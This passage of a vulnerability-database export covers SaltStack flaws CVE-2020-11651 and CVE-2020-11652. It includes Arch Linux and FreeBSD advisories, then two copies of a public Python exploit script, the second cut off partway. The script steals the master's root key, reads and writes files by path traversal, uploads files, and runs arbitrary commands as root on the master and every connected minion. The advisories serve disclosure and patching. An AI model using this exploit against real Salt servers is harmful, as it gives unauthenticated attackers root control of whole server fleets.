overseeing cybersecurity in factories and implementing measures to overcome these challenges. 
In this article, Trend Micro carries out an analysis to uncover the challenges that lie in the way of promoting factory security from an IT perspective._\n\n[**21 Tips to Stay Secure, Private, and Productive as You Work from Home on Your Mac**](<https://blog.trendmicro.com/21-tips-to-stay-secure-private-and-productive-as-you-work-from-home-on-your-mac/>)\n\n_If you brought a Mac home from the office, it\u2019s likely already set up to meet your company\u2019s security policies. But what if you are using your personal Mac to work from home? You need to outfit it for business, to protect it and your company from infections and snooping, while ensuring it continues to run smoothly over time. In this blog, learn 21 tips for staying secure, private, and productive while working from home on your Mac. _\n\nSurprised by the new wave of Sandworm attacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers](<https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-05-29T12:27:26", "type": "trendmicroblog", "title": "This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-29T12:27:26", "id": "TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D", "href": "https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:58", "description": "Arch Linux Security Advisory ASA-202005-1\n=========================================\n\nSeverity: Critical\nDate : 2020-05-05\nCVE-ID : CVE-2020-11651 CVE-2020-11652\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1147\n\nSummary\n=======\n\nThe package salt before version 2019.2.4-1 is vulnerable to multiple\nissues including arbitrary command execution and arbitrary filesystem\naccess.\n\nResolution\n==========\n\nUpgrade to 2019.2.4-1.\n\n# pacman -Syu \"salt>=2019.2.4-1\"\n\nThe problems have been fixed upstream in version 2019.2.4.\n\nWorkaround\n==========\n\nDo not expose salt-master to the internet.\n\nDescription\n===========\n\n- CVE-2020-11651 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class does not\nproperly validate method calls. This allows a remote user to access\nsome methods without authentication. These methods can be used to\nretrieve user tokens from the salt master and/or run arbitrary commands\non salt minions.\n\n- CVE-2020-11652 (arbitrary filesystem access)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class allows access\nto some methods that improperly sanitize paths. 
These methods allow\narbitrary directory access to authenticated users.\n\nImpact\n======\n\nA remote unauthenticated user can execute arbitrary commands and access\nfiles on the affected host.\n\nReferences\n==========\n\nhttps://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\nhttps://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst\nhttps://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7\nhttps://github.com/saltstack/salt/commit/cce7abad9c22d9d50ccee2813acabff8deca35dd\nhttps://security.archlinux.org/CVE-2020-11651\nhttps://security.archlinux.org/CVE-2020-11652", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "archlinux", "title": "[ASA-202005-1] salt: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "ASA-202005-1", "href": "https://security.archlinux.org/ASA-202005-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nF-Secure 
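The Arch advisory above attributes CVE-2020-11651 to ClearFuncs not validating which methods a request may call, so that the private helpers `_prep_auth_info` and `_send_pub` were reachable from the network. The following is an added illustration, not Salt's code and not taken from any advisory on this page: `ToyClearFuncs` is a hypothetical stand-in for the master's handler whose method names follow the advisory but whose bodies are placeholders, `ROOT_KEY` is a constructed sample value, and the `EXPOSED` set is my assumption about the intended public surface. It contrasts resolving the request's `cmd` field directly as an attribute with resolving it only through an explicit allowlist (the shape of the upstream fix referenced in the advisory), and replays the three-step chain F-Secure describes (leak the key, push a job to the publisher, use the key on a key-checked entry point) against both dispatchers.

```python
"""Open attribute dispatch versus an explicit allowlist on an
unauthenticated request handler.

Added illustration; ToyClearFuncs is a hypothetical stand-in for
salt-master's ClearFuncs, not Salt's code. Method names follow the ones
the advisory quotes; bodies are placeholders. ROOT_KEY is a constructed
sample value, EXPOSED an assumed list of the intended public methods.
"""

ROOT_KEY = "constructed-root-key-0123456789abcdef"  # constructed, not a real secret


class ToyClearFuncs:
    """Handler behind the clear-text channel (stand-in, not Salt's class)."""

    def __init__(self):
        self.published = []  # loads that would have reached the publish socket

    # Methods the channel is meant to expose to remote callers.
    def ping(self, load):
        return "pong"

    def wheel(self, load):
        # Key-authenticated entry point: a caller holding the root key
        # runs wheel functions with the master's local root privileges.
        if load.get("key") != ROOT_KEY:
            return {"error": "not authorised"}
        return {"data": {"return": "ran %s" % load.get("fun")}}

    # Internal helpers that must never be reachable from the wire.
    def _prep_auth_info(self, load):
        return [None, None, {"root": ROOT_KEY}]

    def _send_pub(self, load):
        self.published.append(load)
        return None


def dispatch_vulnerable(funcs, load):
    """Resolve 'cmd' by name on the handler: every attribute is callable."""
    cmd = load.get("cmd")
    if not isinstance(cmd, str) or not hasattr(funcs, cmd):
        return {"error": "unknown command"}
    return getattr(funcs, cmd)(load)


EXPOSED = frozenset({"ping", "wheel"})  # assumption: the intended public surface


def dispatch_hardened(funcs, load):
    """Resolve only names on the allowlist; private helpers are unreachable."""
    cmd = load.get("cmd")
    if not isinstance(cmd, str) or cmd not in EXPOSED:
        return {"error": "unauthorized"}
    return getattr(funcs, cmd)(load)


def attacker_session(dispatch):
    """Replay the advisory's attack chain against a dispatcher and report the outcome.

    Step 1 asks for the root key, step 2 pushes a job straight to the
    publisher, step 3 presents whatever key step 1 returned to the
    key-checked wheel entry point.
    """
    funcs = ToyClearFuncs()
    resp = dispatch(funcs, {"cmd": "_prep_auth_info"})
    key = resp[2]["root"] if isinstance(resp, list) else None
    dispatch(funcs, {"cmd": "_send_pub", "fun": "cmd.run", "tgt": "*", "arg": ["id"]})
    wheel = dispatch(funcs, {"cmd": "wheel", "key": key, "fun": "file_roots.read"})
    return {
        "root_key_leaked": key == ROOT_KEY,
        "jobs_published": len(funcs.published),
        "wheel_ran": "data" in wheel,
        "ping": dispatch(funcs, {"cmd": "ping"}),
    }


if __name__ == "__main__":
    print("open dispatch:", attacker_session(dispatch_vulnerable))
    print("allowlisted:  ", attacker_session(dispatch_hardened))
```

The point of the allowlist is that the private-name convention (`_prefix`) is not a security boundary: a request body can name any attribute, so the set of callable methods has to be stated positively rather than inferred from naming.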
reports:\n\nCVE-2020-11651 - Authentication bypass vulnerabilities\nThe ClearFuncs class processes unauthenticated requests and\n\t unintentionally exposes the _send_pub() method, which can be used to\n\t queue messages directly on the master publish server. Such messages\n\t can be used to trigger minions to run arbitrary commands as root.\nThe ClearFuncs class also exposes the method _prep_auth_info(),\n\t which returns the \"root key\" used to authenticate commands from the\n\t local root user on the master server. This \"root key\" can then be\n\t used to remotely call administrative commands on the master server.\n\t This unintentional exposure provides a remote un-authenticated\n\t attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities\nThe wheel module contains commands used to read and write files\n\t under specific directory paths. The inputs to these functions are\n\t concatenated with the target directory and the resulting path is not\n\t canonicalized, leading to an escape of the intended path restriction.\nThe get_token() method of the salt.tokens.localfs class (which is\n\t exposed to unauthenticated requests by the ClearFuncs class) fails\n\t to sanitize the token input parameter which is then used as a\n\t filename, allowing insertion of \"..\" path elements and thus reading\n\t of files outside of the intended directory. 
The only restriction is\n\t that the file has to be deserializable by salt.payload.Serial.loads().\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "freebsd", "title": "salt -- multiple vulnerabilities in salt-master process", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "6BF55AF9-973B-11EA-9F2C-38D547003487", "href": "https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-18T23:21:36", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "zdt", 
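F-Secure's description of CVE-2020-11652 names two distinct defects: wheel functions that concatenate a caller-supplied path onto a base directory without canonicalising the result, and `get_token()` using the token parameter directly as a filename. The block below is an added illustration, not Salt's code and not the upstream fix (the commits listed in the Arch advisory carry that). It shows the unchecked join beside a confined join that canonicalises and then checks containment, and an allowlist check for token identifiers; the scratch directory layout, the 32-hex-character token format and all sample inputs are constructed assumptions for the demo.

```python
"""Path confinement and identifier allowlisting for the two CVE-2020-11652
patterns: an uncanonicalised base-directory join and a token id used as a
filename.

Added illustration; not Salt's code. Directory layout, token format and
sample inputs are assumptions chosen for the demo.
"""
import os
import re
import shutil
import tempfile


def join_unchecked(base, user_path):
    """The vulnerable shape: concatenate and trust the result."""
    return os.path.join(base, user_path)


def join_confined(base, user_path):
    """Canonicalise, then require the result to stay under base.

    Returns the resolved path, or None when it escapes via '..', an
    absolute component, or a symlink that points outside base.
    """
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    try:
        if os.path.commonpath([base_real, candidate]) != base_real:
            return None
    except ValueError:  # no common prefix at all (e.g. different drives)
        return None
    return candidate


TOKEN_RE = re.compile(r"^[0-9a-f]{32}$")  # assumption: tokens are 32 lowercase hex chars


def token_path(token_dir, token):
    """Allowlist the identifier instead of trying to strip '..' out of it."""
    if not isinstance(token, str) or not TOKEN_RE.match(token):
        return None
    return os.path.join(token_dir, token)


def demo():
    """Exercise both joins on constructed inputs inside a scratch tree.

    Returns a dict of results so the behaviour can be asserted on.
    """
    root = tempfile.mkdtemp(prefix="salt_demo_")
    try:
        file_root = os.path.join(root, "srv", "salt")      # stands in for a file_roots dir
        os.makedirs(file_root)
        secret = os.path.join(root, "etc_secret")          # lives outside file_root
        with open(secret, "w") as fh:
            fh.write("master-only")
        os.symlink(root, os.path.join(file_root, "escape"))  # symlink pointing out

        inputs = {
            "plain": "top.sls",
            "dotdot": "../../etc_secret",
            "absolute": secret,
            "symlink": "escape/etc_secret",
        }
        unchecked = {k: os.path.realpath(join_unchecked(file_root, v)) for k, v in inputs.items()}
        confined = {k: join_confined(file_root, v) for k, v in inputs.items()}
        secret_real = os.path.realpath(secret)
        tokens = "/var/cache/salt/master/tokens"  # assumed token_dir; never touched
        return {
            "unchecked_escapes": sorted(k for k, p in unchecked.items() if p == secret_real),
            "confined_refused": sorted(k for k, p in confined.items() if p is None),
            "confined_plain": confined["plain"],
            "file_root": os.path.realpath(file_root),
            "token_ok": token_path(tokens, "0f" * 16) is not None,
            "token_traversal": token_path(tokens, "../../../etc/shadow"),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note the order of operations in `join_confined`: resolve first, compare second. Checking for `..` substrings before joining misses absolute paths (`os.path.join` discards the base when the second argument is absolute) and symlinks, both of which only show up after `realpath`. For the token case there is no legitimate reason for the identifier to contain path characters at all, so rejecting anything outside the expected alphabet is simpler and safer than sanitising.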
"title": "Saltstack 3000.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T00:00:00", "id": "1337DAY-ID-34358", "href": "https://0day.today/exploit/description/34358", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\n# Exploit Author: Jasper Lievisse Adriaanse\n# Vendor Homepage: https://www.saltstack.com/\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\n# Tested on: Debian 10 with Salt 2019.2.0\n# CVE : CVE-2020-11651 and CVE-2020-11652\n# Discription: Saltstack authentication bypass/remote code execution\n#\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\n#!/usr/bin/env python\n#\n# Exploit for CVE-2020-11651 and CVE-2020-11652\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport datetime\nimport os\nimport os.path\nimport sys\nimport time\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\n\ndef init_minion(master_ip, master_port):\n minion_config = {\n 'transport': 'zeromq',\n 'pki_dir': '/tmp',\n 'id': 'root',\n 'log_level': 'debug',\n 'master_ip': 
master_ip,\n 'master_port': master_port,\n 'auth_timeout': 5,\n 'auth_tries': 1,\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n }\n\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n# --- check funcs ----\n\ndef check_salt_version():\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\n\n vi = salt.version.__version_info__\n\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\n return True\n else:\n return False\n\ndef check_connection(master_ip, master_port, channel):\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\n sys.stdout.flush()\n\n # connection check\n try:\n channel.send({'cmd':'ping'}, timeout=2)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"OFFLINE\")\n sys.exit(1)\n else:\n print(\"ONLINE\")\n\ndef check_CVE_2020_11651(channel):\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\n sys.stdout.flush()\n # try to evil\n try:\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n pass\n finally:\n if rets:\n root_key = rets[2]['root']\n return root_key\n\n return None\n\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'cmd': 'get_token',\n 'arg': [],\n 'token': top_secret_file_path,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n print(\"NO\")\n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... 
\", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': top_secret_file_path,\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return']:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'data': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n\n pp(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... 
\", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'config.update_config',\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'yaml_contents': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652.conf')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef pwn_read_file(channel, root_key, path, master_ip):\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': path,\n 'saltenv': 'base',\n }\n\n rets = channel.send(msg, timeout=3)\n print(rets['data']['return'][0][path])\n\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\n sys.stdout.flush()\n\n try:\n fh = open(src, 'rb')\n payload = fh.read()\n fh.close()\n except Exception as e:\n print('[-] Failed to read {}: {}'.format(src, e))\n return\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'saltenv': 'base',\n 'data': payload,\n 'path': dest,\n }\n\n rets = channel.send(msg, timeout=3)\n print('[ ] {}'.format(rets['data']['return']))\n\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'runner',\n 'fun': 'salt.cmd',\n 'saltenv': 'base',\n 'user': 'sudo_user',\n 'kwarg': {\n 'fun': 'cmd.exec_code',\n 'lang': 'python',\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\n },\n 'jid': jid,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n 
except Exception as e:\n print('[-] Failed to submit job')\n return\n\n if rets.get('jid'):\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\n\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': '_send_pub',\n 'fun': 'cmd.run',\n 'user': 'root',\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\n 'tgt': '*',\n 'tgt_type': 'glob',\n 'ret': '',\n 'jid': jid\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n finally:\n if rets == None:\n print('[+] Successfully submitted job to all minions.')\n else:\n print('[-] Failed to submit job')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\n parser.add_argument('--read', '-r', dest='read_file')\n parser.add_argument('--upload-src', dest='upload_src')\n parser.add_argument('--upload-dest', dest='upload_dest')\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\n args = parser.parse_args()\n\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. 
Hit ^C to abort.\")\n time.sleep(1)\n\n # Both src and destination are required for uploads\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\n print('[-] Must provide both --upload-src and --upload-dest')\n sys.exit(1)\n\n channel = init_minion(args.master_ip, args.master_port)\n\n if check_salt_version():\n print(\"[ ] This version of salt is vulnerable! Check results below\")\n elif args.force:\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\n else:\n sys.exit()\n\n check_connection(args.master_ip, args.master_port, channel)\n \n root_key = check_CVE_2020_11651(channel)\n if root_key:\n print('\\n[*] root key obtained: {}'.format(root_key))\n else:\n print('[-] Failed to find root key...aborting')\n sys.exit(127)\n\n if args.run_checks:\n # Assuming this check runs on the master itself, create a file with \"secret\" content\n # and abuse CVE-2020-11652 to read it.\n top_secret_file_path = '/tmp/salt_cve_teta'\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\n fd.write(\"top secret\")\n\n # Again, this assumes we're running this check on the master itself\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\n root_key = keyfd.read()\n\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\n check_CVE_2020_11652_write1(debug, channel, root_key)\n check_CVE_2020_11652_write2(debug, channel, root_key)\n os.remove(top_secret_file_path)\n sys.exit(0)\n\n if args.read_file:\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\n\n if args.upload_src:\n if os.path.isabs(args.upload_dest):\n print('[-] Destination path must be relative; aborting')\n sys.exit(1)\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\n\n\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\n\n if args.exec:\n 
pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\n\n if args.exec_all:\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\n time.sleep(2)\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/34358", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T11:20:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "zdt", "title": "Saltstack 3000.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-07T00:00:00", "id": "1337DAY-ID-34389", "href": "https://0day.today/exploit/description/34389", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\n# Date: 2020-05-04\n# Exploit Author: Jasper Lievisse Adriaanse\n# Vendor Homepage: https://www.saltstack.com/\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\n# Tested on: Debian 10 with Salt 2019.2.0\n# CVE : CVE-2020-11651 and CVE-2020-11652\n# 
Discription: Saltstack authentication bypass/remote code execution\n#\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\n#!/usr/bin/env python\n#\n# Exploit for CVE-2020-11651 and CVE-2020-11652\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport datetime\nimport os\nimport os.path\nimport sys\nimport time\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\n\ndef init_minion(master_ip, master_port):\n minion_config = {\n 'transport': 'zeromq',\n 'pki_dir': '/tmp',\n 'id': 'root',\n 'log_level': 'debug',\n 'master_ip': master_ip,\n 'master_port': master_port,\n 'auth_timeout': 5,\n 'auth_tries': 1,\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n }\n\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n# --- check funcs ----\n\ndef check_salt_version():\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\n\n vi = salt.version.__version_info__\n\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\n return True\n else:\n return False\n\ndef check_connection(master_ip, master_port, channel):\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\n sys.stdout.flush()\n\n # connection check\n try:\n channel.send({'cmd':'ping'}, timeout=2)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"OFFLINE\")\n sys.exit(1)\n else:\n print(\"ONLINE\")\n\ndef check_CVE_2020_11651(channel):\n print(\"[+] Checking if vulnerable to CVE-2020-11651... 
